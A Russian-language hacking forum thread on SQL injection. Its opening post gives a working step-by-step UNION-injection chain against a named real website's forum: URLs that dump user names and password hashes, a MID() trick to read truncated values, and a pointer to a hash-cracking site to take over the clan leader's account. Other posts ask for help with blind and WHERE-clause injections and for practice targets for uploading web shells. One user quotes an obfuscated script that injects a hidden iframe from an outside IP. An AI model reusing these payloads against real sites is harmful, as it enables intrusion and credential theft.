2 diznt, 2 gisTy, 2 sabe По поводу сайта http://darkbrotherhood.ru ЦМС koobi. Версия мускула 4.1.22 (ну и ясно что никакой информатион_схемы нету) Дырок хватает. Все что я нашел вели только к посимвольному бруту, кроме одной и вот она интересна раскруткой. Дыра в форуме вот тут http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13/* Вроде все нормально, но... Качаем koobi смотрим таблицы, и колонки (я скачал немного не ту версию, но догадался с префиксом) Запрос http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,uname,pass,13+from+k_user/* выдет странную картину - имена и пароли (хеши) видны не полностью. Юзаем функции работы со строками в мускуле, я взял MID() Запрос http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(email,1,8),MID(pass,1,8),13+from+k_user/* выдал то что нужно Восьмерку тут MID(pass,1,8) подобираем опытным путем (интересно почему там 8 ) Дальше думаю понятно, меняем 1 так что бы увидеть всю строку целиком. НО, хеш можно получать и не весь, вполне хватит первых восьми символов, с ними идем сюда http://hashcracking.info , выбираем поиск по маске и получаем пасс У этой ЦМС в админке бывает авторизация по мылу, но тут по логину юзера. Его находим вот тут (на случай логина больше 8 символов) http://darkbrotherhood.ru/index.php?area=1&p=static&page=sostav (Глава клана) Поэтому последний запрос вот такой http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(uname,1,8),MID(pass,1,8),13+from+k_user+where+uname=CHAR(68,97,114,107,101,108,118,101)/* ... Было интересно исследовать. Может кто найдет другой путь?
Ребят, подскажите какой-то багнутый движок чего-нибудь на локалхостЪ, чтоб потренироваться шелл заливать?
Сорри, если не в тему. Если кому надо (как я видел в комментах к одному видео оч сильно просили), то написал код быстрого кодирования в hex с локалхоста: Code: <form action='<? $PHP_SELF; ?>' method=POST> <input type=text name='hex'> <input type=SUBMIT value="OK"> </form> <? error_reporting(0); echo "$hex= "; echo("0x".bin2hex("$hex")) ?>
чо делать если нет принтабельных полей подобрал кол-во полей попробывал ни одно не выводит даже в тело документа ????
2 Vid0k Это т.н. слепая иньекция. Делай посимвольный перебор, долго ну а шо делать Почитать можно тут http://www.securitylab.ru/contest/212099.php или тут http://forum.antichat.ru/showthread.php?t=35207 Вобщем вопрос этот решаем. Удачи. Да кстати... попробуй ЕЩЕ поискать вывод... иногда он бывает весьма необычным
script <!-- var d=document,kol=561; function O10H485B5B18EDFA3(H485B5B18EE79A){ return( parseInt(H485B5B18EE79A,16));}function H485B5B18EF78A(H485B5B18EFF82){ function H485B5B18F176E() {var H485B5B18F1F66=2;return H485B5B18F1F66;} var H485B5B18F077B='';for(H485B5B18F0F74=0; H485B5B18F0F74<H485B5B18EFF82.length; H485B5B18F0F74+=H485B5B18F176E()){ H485B5B18F077B += ( String.fromCharCode (O10H485B5B18EDFA3(H485B5B18EFF82.substr(H485B5B18F0F74, H485B5B18F176E()))));}return H485B5B18F077B;} document.write(H485B5B18EF78A('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3430383539292B27353438333662306638355C272077696474683D343439206865696768743D3931207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E')); //--> / script ребят что это такое? и как с этим боротся? появляется сразу после боди..
очевидно это реклама, добавляемая бесплатным хостингом. ЕСли работают файлы ХТАККЕССы, то можешь изменить расширение не на пхп а на другое, тогда может убраться
есть трабла.. подобрал колонки 22 штуки.. через +order+by+22/* иньекция происходит в where clause пробвал использовать and но не получилось... закрывал скобки по разному.. тож нече.. пробвал обходить фильтрацию.. нифига. или сдесь: подскажите что делать?
вопрос специалистам.... делаю http://site.com/index.php?m=vopros-otvet+AND+ASCII(SUBSTRING((select from user limit 3,1 ),4,1))>57/* получаю Ll('<P CPgT1gQD"<.X(?j и так далее.....что это за бред?
Хочу соединиться с удаленным mysql через шелл. Пишет: Lost connection to MySQL server at 'reading initial communication packet', system error: 61 То есть, запрещено на конечном mysql сервере подключения извне?
